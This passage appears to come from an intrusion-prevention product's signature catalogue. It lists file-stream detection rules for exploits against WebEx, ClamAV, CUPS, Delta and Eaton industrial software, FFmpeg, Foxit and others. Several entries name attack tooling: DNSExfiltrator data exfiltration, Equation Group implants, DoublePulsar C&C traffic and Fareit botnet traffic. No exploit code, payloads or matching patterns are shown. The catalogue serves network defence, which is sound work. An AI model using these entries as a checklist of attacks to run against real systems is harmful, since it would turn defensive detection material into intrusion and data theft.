Tags: Any Operating System, Any Hardware, Cisco Webex Player, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow
Description:
Back to top

File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Player, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-456-5211
Vulnerability: Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow
Description:
Back to top

File-Binary_Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service

About this situation: Denial of service exploit against Clam AntiVirus TNEF decoding vulnerability
Context: Other Binary File Stream
Severity: 2
Tags: Linux, Any Hardware, ClamAV, MS2006-01, CVE2005, CVE2006, Linux not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1730-5242
Vulnerability: Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
Description:
Back to top

File-Binary_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in ClamAV AntiVirus detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
Description:
Back to top

File-Binary_Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in ClamAV antivirus detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
Description:
Back to top

File-Binary_Clamav-DMG-CLI_scandmg-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in ClamAV Project ClamAV detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Clamav-DMG-CLI_scandmg-External-Entity-Injection
Description:
Back to top

File-Binary_Conflicting-Content-Type-JPEG

About this situation: Detected conflicting Content-Type header
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-1012-5242
Last changed: sgpkg-ips-1012-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Binary_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Information
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1122-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Binary_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Information
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1122-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Binary_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Information
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1122-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Binary_CoolPlayer-Playlist-File-Handling-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in CoolPlayer detected
Context: Other Binary File Stream
Severity: 10
Tags: Windows, Any Hardware, CoolPlayer, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: CoolPlayer-Playlist-File-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Corel-Wordperfect-Document-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Corel WordPerfect Office X6 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Corel WordPerfect Office, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Corel-Wordperfect-Document-Processing-Buffer-Overflow
Description:
Back to top

File-Binary_CUPS-Command-Injection-CVE-2024-47176

About this situation: An attempt to exploit a vulnerability in cups-browsed detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, cups-browsed, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Suspicious-IPP-Request-CVE-2024-47176
Description:
Back to top

File-Binary_CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177

About this situation: An attempt to exploit a vulnerability in cups-filters detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, cups-filters, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1783-5242
Last changed: sgpkg-ips-1791-5242
Vulnerability: CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177
Suspicious-IPP-Request-CVE-2024-47176
Description:
Back to top

File-Binary_Debian-Binary-Installation-Package

About this situation: Detected a download attempt of an executable content
Context: Other Binary File Stream
Severity: 2
Tags: Ubuntu Linux, Debian GNU/Linux, Any Hardware, Debian GNU/Linux not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Debian-Installation-Package
File-Type-Identification
Description:
Back to top

File-Binary_Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Electronics CNCSoft ScreenEditor detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Delta Electronics CNCSoft, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Vulnerability: Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation CNCSoft ScreenEditor detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics CNCSoft, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Electronics ScreenEditor detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics ScreenEditor, Delta Electronics CNCSoft, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1562-5242
Last changed: sgpkg-ips-1562-5242
Vulnerability: Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation CNCSoft ScreenEditor detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics CNCSoft, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1503-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF
Description:
Back to top

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Electronics CNCSoft detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics CNCSoft, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1255-5242
Vulnerability: Delta-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF

About this situation: An attempt to exploit a vulnerability in Delta Electronics ScreenEditor detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics CNCSoft, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF
Description:
Back to top

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Electronics CNCSoft detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics CNCSoft, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1189-5242
Vulnerability: Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAScreen detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAScreen, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Vulnerability: Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DOPSoft.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Industrial Automation DOPSoft, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_DGit-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955

About this situation: An attempt to exploit a vulnerability in Git LFS detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Git LFS, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Git-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955
Description:
Back to top

File-Binary_Disk-Image-Transfer

About this situation: A disk image transfer detected
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Description:
Back to top

File-Binary_DLL-Planting-Remote-Code-Execution-Vulnerability

About this situation: A suspicious shell link file that resembles an attempt to exploit a vulnerability in Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: DLL-Planting-Remote-Code-Execution
Description:
Back to top

File-Binary_DNSExfiltrator-Traffic

About this situation: A DNS over HTTPS request associated with DNSExfiltrator tool detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1073-5242
Last changed: sgpkg-ips-1073-5242
Description:
Back to top

File-Binary_DoblePulsar-PeddleCheap-Implant-Traffic

About this situation: Malware C & C traffic
Context: Other Binary File Stream
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1019-5242
Vulnerability: DoblePulsar-PeddleCheap-Implant-Traffic
Description:
Back to top

File-Binary_Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Eaton HmiSoft VU3 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton HmiSoft VU3, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Eaton HmiSoft VU3 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton HmiSoft VU3, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1263-5242
Vulnerability: Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities
Description:
Back to top

File-Binary_Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Eaton HMiSoft VU3 detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Eaton HmiSoft VU3, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1268-5242
Vulnerability: Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Eaton HmiSoft VU3 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton HmiSoft VU3, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Eaton HMiSoft VU3 detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Eaton HmiSoft VU3, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Eaton HmiSoft VU3 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton HmiSoft VU3, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-Binary_ELF-Executable-File-Transfer

About this situation: Executable file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

File-Binary_Embedded-Zip-Archive

About this situation: Embedded zip archive download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1275-5242
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF

About this situation: Detects EMF images that will cause a buffer overflow in Windows Graphics Rendering Engine
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Graphics Rendering Engine, MS2004-10, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: EMF-Windows-Graphics-Rendering-Engine-BOF
Description:
Back to top

File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF-2

About this situation: Detects EMF images that will cause a buffer overflow in Windows Graphics Rendering Engine
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Graphics Rendering Engine, MS2004-10, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-695-5211
Vulnerability: EMF-Windows-Graphics-Rendering-Engine-BOF
Description:
Back to top

File-Binary_Endian-Firewall-Proxy-Password-Change-Command-Execution

About this situation: An attempt to exploit a vulnerability in Endian Firewall detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Endian Firewall, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Endian-Firewall-Proxy-Password-Change-Command-Execution
Description:
Back to top

File-Binary_EQGRP-Durablenapkin.Solaris.2.0.1.1

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Binary_EQGRP-noclient

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Binary_Exiftool-DjVu-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in ExifTool Project ExifTool detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, ExifTool, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Vulnerability: Exiftool-DjVu-Remote-Code-Execution
Description:
Back to top

File-Binary_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service

About this situation: Malicious ACE archive file detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, F-Prot Anti-Virus, CVE2006, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: HTTP-F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
Description:
Back to top

File-Binary_F-Secure-AntiVirus-Library-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in F-Secure Anti-Virus detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, F-Secure Anti-Virus, F-Secure Internet Gatekeeper, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: F-Secure-AntiVirus-Library-Heap-Overflow
Description:
Back to top

File-Binary_Fareit-A-Botnet-Traffic

About this situation: Fareit botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Fareit
Description:
Back to top

File-Binary_Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Fatek Automation PLC WinProladder detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fatek Automation PLC WinProladder, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Fatek Automation PLC WinProladder detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fatek Automation PLC WinProladder, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Fatek Automation PLC WinProladder detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fatek Automation PLC WinProladder, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Vulnerability: Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FFmpeg
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FFmpeg Project Team FFmpeg, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1268-5242
Vulnerability: FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_FFmpeg-OGV-File-Format-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in FFmpeg over HTTP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FFmpeg Project Team FFmpeg, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: FFmpeg-OGV-File-Format-Memory-Corruption
Description:
Back to top

File-Binary_FFmpeg-Vmd_Read_Header-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in FFmpeg Project Team FFmpeg detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, FFmpeg Project Team FFmpeg, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-895-5242
Vulnerability: FFmpeg-Vmd_Read_Header-Integer-Overflow
Description:
Back to top

File-Binary_Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FLAC Project libFLAC detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libflac, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow
Description:
Back to top

File-Binary_Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FLAC Project libFLAC detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libflac, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow
Description:
Back to top

File-Binary_Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow
Description:
Back to top

File-Binary_Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1068-5242
Vulnerability: Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Studio Photo detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Studio Photo, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Studio Photo detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Studio Photo, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1255-5242
Vulnerability: Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Studio Photo detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Studio Photo, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write
Description:
Back to top

File-Binary_Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Studio Photo detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Foxit Studio Photo, CVE2020, Windows not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1286-5242
Last changed: sgpkg-ips-1286-5242
Vulnerability: Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow
Description:
Back to top

